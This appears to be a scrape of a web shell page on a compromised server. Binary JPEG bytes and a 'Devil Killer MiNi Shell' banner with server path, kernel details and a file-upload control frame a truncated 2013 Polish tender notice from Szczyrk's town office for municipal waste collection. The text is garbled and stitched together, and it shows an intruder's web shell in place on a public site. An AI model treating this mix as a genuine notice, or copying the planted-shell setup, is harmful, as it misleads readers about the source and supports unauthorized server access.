JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/505636-N-2013.html

<p class="kh_header"><b>Szczyrk: Odbiór odpadów komunalnych od właścicieli nieruchomości położonych na terenie gminy Szczyrk i ich transport do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych - Zakładu  Gospodarki Odpadami S.A. w Bielsku-Białej przy ul. Krakowskiej 315d</b><br>
<b>Numer ogłoszenia: 505636 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych od właścicieli nieruchomości położonych na terenie gminy Szczyrk i ich transport do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych - Zakładu  Gospodarki Odpadami S.A. w Bielsku-Białej przy ul. Krakowskiej 315d.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest odbiór odpadów komunalnych  od właścicieli nieruchomości  w Szczyrku  i ich transport do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych (RIPOK) - Zakładu  Gospodarki Odpadami S.A. w Bielsku-Białej przy ul. Krakowskiej 315d w okresie od dnia 1 stycznia 2014r. do dnia  31 grudnia 2014r. 
1.1 Rodzaj i ilość odpadów
1) Usługa odbierania i transportu odpadów komunalnych od właścicieli nieruchomości z terenu gminy Szczyrk obejmuje:
a) odbieranie odpadów komunalnych wymienionych w tabeli nr 1 od wszystkich właścicieli nieruchomości zamieszkałych jak i niezamieszkałych, na których powstają odpady komunalne,(wykaz nieruchomości mający charakter poglądowy, stanowi załącznik  nr  8  do SIWZ),
b) transport zebranych odpadów komunalnych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych - Zakładu  Gospodarki Odpadami S.A. w Bielsku-Białej przy ul. Krakowskiej 315d w Bielsku-Białej.
2) Wykonawca przy sporządzeniu oferty winien uwzględnić dane zawarte w tabelach, w szczególności w tabelach nr 2 i 3, a także zobowiązany jest do oszacowania wzrostu ilości odbieranych odpadów w trakcie trwania umowy.
1.2  Charakterystyka Gminy Szczyrk
1) Powierzchnia gminy wynosi 3907 ha,
2) Liczba zameldowanych  mieszkańców gminy wynosi ok. 5623 mieszkańców.
1.3 Sposób odbierania odpadów komunalnych 
1)Wykonawca jest zobowiązany do odbierania odpadów komunalnych:
a) w sposób ciągły, nie zakłócający spoczynku nocnego,
b) w terminach wynikających z przyjętego harmonogramu odbioru,
c) niezależnie od warunków atmosferycznych, 
d) pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów, w sposób wykluczający mieszanie odpadów lub zanieczyszczanie poszczególnych frakcji odpadów ,
2) Wykonawca zobowiązany jest do odebrania wszystkich odpadów komunalnych określonych  w tabeli nr 1 wytworzonych na terenie nieruchomości zamieszkałych, zgromadzonych w pojemnikach, w tym segregowanych w workach o pojemności 120 litrów.
W przypadku nieruchomości niezamieszkałych, na których wytwarzane są odpady komunalne, zgromadzone w pojemnikach, Wykonawca odbiera odpady  w ilości określonej w deklaracji, natomiast w sytuacji wystawienia większej  ilości odpadów - pojemników  (ponad ilość deklarowaną), Wykonawca odbierze wszystkie odpady za potwierdzeniem ich odbioru  i przekaże informacje o zaistniałej sytuacji Zamawiającemu  wraz z ww. potwierdzeniem  odbioru   odpadów. 
3) W przypadku, gdy odpady nie są gromadzone w pojemnikach, w tym w workach, Wykonawca obowiązany jest do ich odebrania oraz poinformowania Zamawiającego o nieruchomości, na której odpady nie są gromadzone w sposób odpowiadający wymaganiom Regulaminu utrzymania czystości i porządku na terenie gminy Szczyrk.
1.4 Częstotliwość odbierania. Harmonogram
1)Wymaga się, aby Wykonawca zapewnił odbieranie odpadów z następujących częstotliwościach :
a) Odpady SEGREGOWANE  -  2 razy w miesiącu kalendarzowym, natomiast w miesiącach od 01.01.2014 -  31.03.2014  oraz  01.11.2014  - 31.12.2014r., 1 raz w miesiącu  kalendarzowym.
b) Odpady  POZOSTAŁE     - 2 razy w miesiącu kalendarzowym,
c) Zmieszane odpady komunalne  - 2 razy w miesiącu kalendarzowym, (odpady są zbierane, gdy nie zadeklarowano selektywnej zbiórki odpadów komunalnych). 
2)Wykonawca zobowiązany jest do opracowania Harmonogramu odbierania odpadów, w szczególności biorąc pod uwagę, iż odbiór odpadów nie może następować w dni ustawowo wolne od pracy.
3)Harmonogram obejmujący okres od dnia 1 stycznia 2014r. do dnia 31 grudnia 2014r., winien zostać  opracowany i przedłożony Zamawiającemu w terminie 7 dni od dnia otrzymania od Zamawiającego wykaz adresów nieruchomości objętych usługą .
4)Harmonogram powinien być sporządzony zgodnie z następującymi wytycznymi:
a)zadaniem Wykonawcy jest sporządzenie Harmonogramu zapewniającego regularność  i powtarzalność odbierania, by mieszkańcy mogli w łatwy sposób zaplanować przygotowanie odpadów do odbioru.
5)Harmonogram powinien odpowiadać następującym wytycznym:
a)powinien być sformułowany w sposób przejrzysty, jasny, pozwalający na szybkie  zorientowanie  się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów poszczególnych rodzajów;
b)nie powinien zawierać żadnych dodatkowych treści ponad informacje związane  z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd.;
6)Wykonawca powinien umieścić harmonogram na własnej stronie internetowej i eksponować go przez cały okres na jaki został przygotowany. Zamawiający umieści harmonogram na własnej stronie internetowej.
7)Wykonawca jest zobowiązany do przekazania harmonogramu właścicielom nieruchomości wraz z dostarczeniem worków do selektywnej zbiórki odpadów  w ilości odpowiadającej odebranym. Wystarczającym dla obowiązku dostarczenia harmonogramu będzie włożenie ich do skrzynek pocztowych na danej nieruchomości. 	
8)Harmonogram przygotowany na wymagany okres obowiązuje do końca roku, na który został ustalony. W przypadku nieprzewidzianych okoliczności, za zgodą Zamawiającego, dopuszcza się zmianę terminu odbioru odpadów. Wykonawca odpowiedzialny jest w takim przypadku za bieżące poinformowanie Zamawiającego w sposób określony w umowie oraz właścicieli nieruchomości o zmianie.
9)Harmonogram co do treści i formy wymaga zatwierdzenia przez Zamawiającego. Wykonawca przekazuje Zamawiającemu projekt harmonogramu w formie pliku PDF bez zabezpieczeń i haseł. Zamawiający zaakceptuje Harmonogram lub przedstawi uwagi do niego w terminie 7 dni od jego otrzymania. Wykonawca w terminie 7 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji.
1.5. Wymagania co do sposobu odbierania odpadów
1) Wykonawca  obowiązany jest do odbierania  odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności do:
a)zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru,
b)uprzątnięcia i odbierania odpadów z miejsc ich gromadzenia, w tym także tych, które nie zostały umieszczone w pojemnikach,
2)Wykonawca obowiązany jest do zebrania i odebrania odpadów z miejsc gromadzenia odpadów (altanek śmietnikowych), również w przypadku, gdy ich wysypanie nie nastąpiło w trakcie odbierania.
3)Wykonawca zobowiązany jest do pozostawiania przy odbiorze odpadów segregowanych z poszczególnych nieruchomości zamieszkałych i mieszanych nowych worków na odpady segregowane o pojemności 120 litrów z folii LDPE o grubości zapewniającej wytrzymałość worków tj. co najmniej 60 mikronów,(worek  przeźroczysty, z tasiemką przytwierdzoną do worka lub taśmą ściągającą albo uszami umożliwiającymi wiązanie worka) na wymianę w ilości zgodnej z odebranymi .
4)Wykonawca  zobowiązany jest do opróżniania pojemników na przeterminowane leki nie rzadziej niż raz na kwartał lub po zgłoszeniu przez Zamawiającego  ich przepełnienia. Wykaz aptek,  w których znajdują się pojemniki na przeterminowane leki zostanie wskazany w wykazie nieruchomości (załącznik nr 8)
5)Wykonawcę obowiązuje:
a)zakaz mieszania selektywnie zebranych odpadów komunalnych z innymi  odpadami komunalnymi odbieranymi od właścicieli nieruchomości.
b)zabezpieczenie przewożonych odpadów przed wysypaniem w trakcie transportu; w przypadku wysypania Wykonawca obowiązany jest do natychmiastowego uprzątnięcia odpadów oraz skutków ich wysypania (zabrudzeń, plam, itd.).
6) Wykonawca ponosi odpowiedzialność za zniszczenie lub uszkodzenie pojemników do gromadzenia odpadów należących do właścicieli nieruchomości, powstałych w związku z realizacją Przedmiotu Umowy, na zasadach określonych w Kodeksie cywilnym.
7) Wykonawca zobowiązany jest do spełnienia wymagań określonych w Rozporządzeniu Ministra Środowiska  z dnia 25 stycznia 2013r. wydanym na postawie art. 9d ust. 2 ustawy o utrzymaniu porządku i czystości w gminach.
8) Pojazdy powinny być w pełni sprawne, posiadać aktualne badania techniczne, być dopuszczone do ruchu oraz oznakowane widoczną nazwą przedsiębiorcy i numerem jego telefonu.
9) W razie awarii pojazdu Wykonawca zobowiązany jest zapewnić pojazd zastępczy o zbliżonych parametrach.
10) Zamawiający dopuszcza, aby odbieranie surowców następowało przy użyciu pojazdów przystosowanych do odbierania odpadów zmieszanych, przy czym odbierane odpady nie mogą być zgniatane oraz mieszane, a kontenery pojazdów muszą być czyste.
1.6  Do obowiązków Wykonawcy w szczególności należy:
1) Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami ustawy Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 ze zm.) oraz Rozporządzeniem wydanym na podstawie  art. 9d ust. 2 ustawy z dn. 13 września 2012 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2012 r. poz. 391 ze zm.).
2) Wykonawca  zapewni,  aby  wszystkie pojazdy wykorzystywane  do  realizacji  przedmiotu  zamówienia  były wyposażone w urządzenia monitorujące, umożliwiające automatyczne zapisywanie w nieulotnej pamięci czasu  pracy,  aktualnej  lokalizacji  i  przebytej  drogi  pojazdów    z  rzeczywistym,  jednoznacznie  wykazanym wykonywaniem  czynności (wyładowanie odpadów) z częstotliwością co 10 sekund lub częściej. W pamięci  dane powinny być przechowywane i możliwe do odczytu przez minimum 30 dni, przy   czym   odczytanie   danych    nie   może   powodować   kasowania   zawartości   pamięci   urządzenia monitorującego.
Wykonawca  zapewni  przez  cały  czas  realizacji  zamówienia  w  uzgodnieniu  z  Zamawiającym  system monitorowania pracy sprzętu obejmujący:
- bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie, w celu zdalnego odczytu ww. danych; pamięć danych powinna być przechowywana i możliwa do odczytu przez minimum 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości pamięci urządzenia monitorującego,
- odwzorowanie  aktualnej  pozycji i  przebytej trasy  pojazdu  na  aktualnej  cyfrowej  mapie  Szczyrk, z dokładnością umożliwiającą jednoznaczne określenie miejsca (adresu) wykonywania prac,
- odtwarzanie i analizę historii pracy sprzętu z okresu realizacji umowy .
Wykonawca będzie posiadał stanowisko dyspozytorskie i wyposaży je w niezbędną infrastrukturę sprzętową umożliwiającą wykonywanie funkcji opisanych w niniejszym punkcie, a także zapewni nieprzerwany dostęp Zamawiającemu w jego siedzibie w dowolnym czasie do ww. danych poprzez sieć internetową  (aktualizacja danych: w trakcie prowadzenia odbierania odpadów nie rzadziej niż co minutę, w pozostałym okresie nie rzadziej niż raz na dobę).
Wykonawca  wyposaży  stanowisko  dyspozytorskie  w  niezbędne  dla  funkcjonowania  systemu  elementy zapewniające ciągłą i niezawodną pracę, w szczególności w zasilanie awaryjne umożliwiające pracę systemu przez min. 1 godz. po zaniku napięcia w sieci energetycznej.
Wykonawca   wyposaży   Zamawiającego   na   czas   trwania   umowy   w konieczne  oprogramowanie   zainstalowane na co najmniej jednym stanowisku komputerowym, będących własnością Zamawiającego. Oprogramowanie  to  umożliwi  bieżącą  kontrolę  pracy  sprzętu  wykorzystywanego  przez  Wykonawcę  do wykonywania   usług   związanych   z odbiorem   i wywozem odpadów   komunalnych,   odwzorowanie   na   monitorze, na aktualnej  cyfrowej  mapie  Szczyrku  z  możliwością  jednoznacznego  określenia  miejsca  (adresu) prowadzenia    przedmiotowych   prac,   poprzez   odczyt   i  analizę   danych   bezpośrednio   z urządzeń monitorujących zamontowanych na sprzęcie, za pośrednictwem sieci internetowej z komputera bazowego (serwera) - codziennie archiwizowanych danych.
Wykonawca przeszkoli osoby wskazane przez Zamawiającego w liczbie nie większej niż 2 osoby w zakresie obsługi oprogramowania. Szkolenie musi się odbyć w siedzibie Zamawiającego.
Termin   i   sposób   realizacji   przedmiotowego   szkolenia   zostanie   uzgodniony   między   Wykonawcą, a Zamawiającym w stosownym protokole w dniu podpisania Umowy.
3) wykonawca do 10 dnia każdego miesiąca, dostarczy za poprzedni miesiąc  kalendarzowy na nośniku danych typ CD/ DVD lub prześle e-mailem kopie bazy danych typu MySQL  zawierającą kompletne informacje rejestrowane w systemie, o którym  mowa w pkt 2).
4) wykonanie przedmiotu umowy w sposób sprawny, ograniczający do minimum utrudnienia w ruchu drogowym, korzystaniu z nieruchomości oraz niedogodności dla mieszkańców gminy Szczyrk.
5) zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, jak również odpowiedniego personelu.
6) dokonywanie odbioru i transportu odpadów komunalnych, również w przypadkach, kiedy dojazd do nieruchomości będzie utrudniony z powodu prowadzonych remontów dróg, dojazdów. 
Jednocześnie  informuje się, że z uwagi na dużą ilość nieruchomości na terenie miasta Szczyrk położonych w rejonach górskich, trudnodostępnych, gdzie dojazd jest możliwy tylko wąskimi drogami z małym polem manewru, z bardzo trudnym dojazdem w okresie zimowym, Zamawiający  ustala punkty zbiórki odpadów komunalnych w okresie zimowym (tj. 01.01.2014 -  30.04.2014  oraz  15.11.2014  - 31.12.2014r.), wykaz punktów określa załącznik nr 9.
Jednocześnie ustala się punkty zbiórki odpadów komunalnych w pozostałym okresie ( tj. 01.05.2014r. - 15.11.2014r.) dla nieruchomości, do których nie ma możliwości dojazdu.  Wykaz punktów określa załącznik  nr 10.
Zamawiający  w załączniku nr 8  wskaże dla celów poglądowych  wykaz nieruchomości zabudowanych położonych na terenie Szczyrku .
7) wykonawca ma obowiązek ważyć samochody przed rozpoczęciem zbiórki odpadów  oraz po zakończeniu zbiórki odpadów z terenu gminy Szczyrk na legalizowanej wadze w Punkcie Selektywnej Zbiórki Odpadów Komunalnych w Szczyrku (PSZOK) przy ul. Granicznej 1  oraz przekazywać dokumentację z pomiarów Zamawiającemu w sprawozdaniach miesięcznych z załączonymi kopiami kart przekazania odpadów z  Regionalnej Instalacji  (RIPOK), ważenie winno być potwierdzone przez pracownika PSZOK. 
Ilość zebranych  i zważonych odpadów z terenu  gminy winna być zgodna z  wartościami (ważeniami) wynikającymi z  załączonych  kopi kart przekazania odpadów do RIPOK.
8) wykonawca zobowiązany jest do zapewnienia i wyposażenia nieruchomości zamieszkałych  i mieszanych z których odbierane są odpady komunalne gromadzone w sposób selektywny w worki, o pojemności  120 litrów z folii LDPE  o grubości zapewniającej wytrzymałość worków, tj. co najmniej 60 mikronów - worki przeźroczyste, z tasiemką przytwierdzoną do worka lub taśmą ściągającą albo uszami umożliwiającymi wiązanie worka. Worki winny być oznaczone informacją o rodzaju gromadzonych  w nich odpadów (SEGREGOWANE), nazwą, adresem oraz numerem telefonu Wykonawcy  i Zamawiającego. Zamawiający zastrzega sobie prawo do uzgodnienia szaty graficznej worków przeznaczonych do segregowania odpadów.
9) okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa,
10) ponoszenie odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy w zakresie określonym w Kodeksie cywilnym i innych ustawach.
11) uczestnictwo upoważnionego przedstawiciela Wykonawcy w spotkaniach prowadzonych przez Zamawiającego w przypadku jego zaproszenia,  na którym omawiane będą zadania związane z realizacja przedmiotu umowy. Zaproszenia na spotkania będą przekazywane Wykonawcy w formie elektronicznej lub faksem z co najmniej 7 dniowym wyprzedzeniem.
1.7 Zagospodarowanie odpadów
1) Wykonawca jest zobowiązany do:
a) przekazywania odebranych od właścicieli nieruchomości odpadów komunalnych do składowania do Regionalnych Instalacji do Przetwarzania Odpadów Komunalnych wynikających z Wojewódzkiego Planu Gospodarki Odpadami Komunalnymi, tj. Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK) prowadzonej przez Zakład Gospodarki Odpadami  S.A. przy ul. Krakowskiej 315d w Bielsku-Białej.
W przypadku awarii instalacji regionalnej, o której mowa powyżej, bądź w stanach odbiegających od normalnej eksploatacji, dopuszcza się skierowanie strumienia odpadów do instalacji zastępczych określonych w Wojewódzkim Planie Gospodarki Odpadami. 
b) prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami,
2) Osiągane przez Wykonawcę poziomy recyklingu, przygotowania do ponownego użycia  i odzysku obliczane będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012r. poz. 645).
1.8 Raporty i inne obowiązki informacyjne
1.8.1. Raporty miesięczne
1) Wykonawca jest zobowiązany do przekazywania Zamawiającemu miesięcznych raportów zawierających informacje o:
a) ilości odebranych odpadów zmieszanych [Mg],
b) ilości odebranych odpadów segregowanych [Mg],
c) ilości odebranych odpadów pozostałych [Mg],
d) jakości odebranych odpadów  (tj. informacja Wykonawcy czy odpady odbierane od poszczególnych właścicieli nieruchomości  były zebrane w sposób selektywny zgodnie z opisem worka).
2) Raporty o których mowa muszą być przekazane w formie papierowej i elektronicznej (np.: plik Excel) Zamawiającemu.
3) Raport miesięczny jest podstawą do wystawienia faktury za wykonaną usługę.
Raporty dostarcza się w terminie  do 10 dnia każdego miesiąca, następującego po miesiącu kalendarzowym w którym  nastąpił  odbiór odpadów. Przedmiotowe raporty nie zwalniają Wykonawcy ze sporządzania kwartalnych sprawozdań , o których mowa w art. 9n ustawy o utrzymaniu czystości  i porządku w gminach w terminie do końca miesiąca następującego po kwartale którego dotyczy.  
1.8.2. Informacje wymagane od Wykonawcy
1) Wykonawca jest zobowiązany niezwłocznie nie później jednak niż w terminie 3 dni do przekazywania Zamawiającemu informacji o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie gminy Szczyrk gromadzeniu odpadów, w szczególności ich mieszaniu lub przygotowaniu do obierania w niewłaściwych pojemnikach. Informacja powinna zawierać w szczególności:
a)adres nieruchomości, na której odpady gromadzone są w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie gminy Szczyrk,
b)zdjęcia w postaci cyfrowej dowodzące, że odpady gromadzone są w sposób niewłaściwy; zdjęcia muszą zostać wykonane w taki sposób, aby nie budząc wątpliwości pozwalały na przypisanie pojemników, w tym worków do konkretnej nieruchomości,
c)dane pracowników wykonawcy, którzy stwierdzili fakt niezgodnego z Regulaminem postępowania  z odpadami komunalnymi oraz ewentualne oświadczenia przez nich przekazane,
2) Wykonawca jest zobowiązany do bieżącego przekazywania adresów nieruchomości na których zamieszkują mieszkańcy na których powstały odpady, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.
3) Zamawiający na podstawie złożonych deklaracji dostarczy Wykonawcy wykaz nieruchomości wraz  informacją o zadeklarowanym sposobie gromadzenia odpadów (selektywny lub nieselektywny), na podstawie którego Wykonawca będzie przekazywał informacje o niezgodnym z Regulaminem utrzymania czystości   i porządku na terenie gminy Szczyrk gromadzeniu odpadów.
4) Informacje o których mowa w pkt 1 i 2 Wykonawca przekazuje Zamawiającemu drogą elektroniczną.
1.9. Informacje dodatkowe
Na wykonawcy zamówienia ciążą obowiązki wynikające wprost z przepisów ustawy z dnia  13 września 1996r. o utrzymaniu czystości i porządku w gminach, w szczególności Wykonawca zobowiązany jest do spełnienia wymagań określonych w art. 9d ustawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 7 500,00 zł (słownie: siedem tysięcy pięćset złotych 00/100) .
2. Wadium należy wnieść w terminie do dnia 16.12.2013 r. do godz. 10:00 w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
3. Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Radziechowach-Wieprzu konto: 58 8140 0009 0043 8656 2000 0030 z dopiskiem wadium na : Odbiór odpadów komunalnych od właścicieli nieruchomości położonych na terenie gminy Szczyrk i ich transport do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych - Zakładu  Gospodarki Odpadami S.A. w Bielsku-Białej przy ul. Krakowskiej 315d.
Przy  wnoszeniu  wadium  przelewem,  dokument  polecenia  dokonania  przelewu  nie  jest dowodem wniesienia wadium. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uznaje wadium, które w oznaczonym terminie znajduje się na koncie Zamawiającego.
Zaleca się dołączyć do oferty kopię wykonania przelewu.
4. Wadium w postaci dokumentu należy złożyć w formie oryginału w kasie Urzędu Miejskiego  w Szczyrku,  ul. Beskidzka 4, pokój nr 24 w terminie przed upływem składania ofert.
Gwarancja zapłaty wadium winna być bezwarunkowa i płatna na pierwsze żądanie oraz powinna podlegać prawu polskiemu i być realizowana w Polsce.
Uwaga: Termin ważności gwarancji nie może być krótszy niż termin związania ofertą, tj. 30 dni.
Zamawiający zwraca wadium na zasadach określonych w art. 46  Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży:
a)wpis do rejestru działalności regulowanej prowadzonego dla gminy Szczyrk w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.
b)zezwolenie na transport odpadów będących przedmiotem niniejszego zamówienia, a wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. Nr 21), lub wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
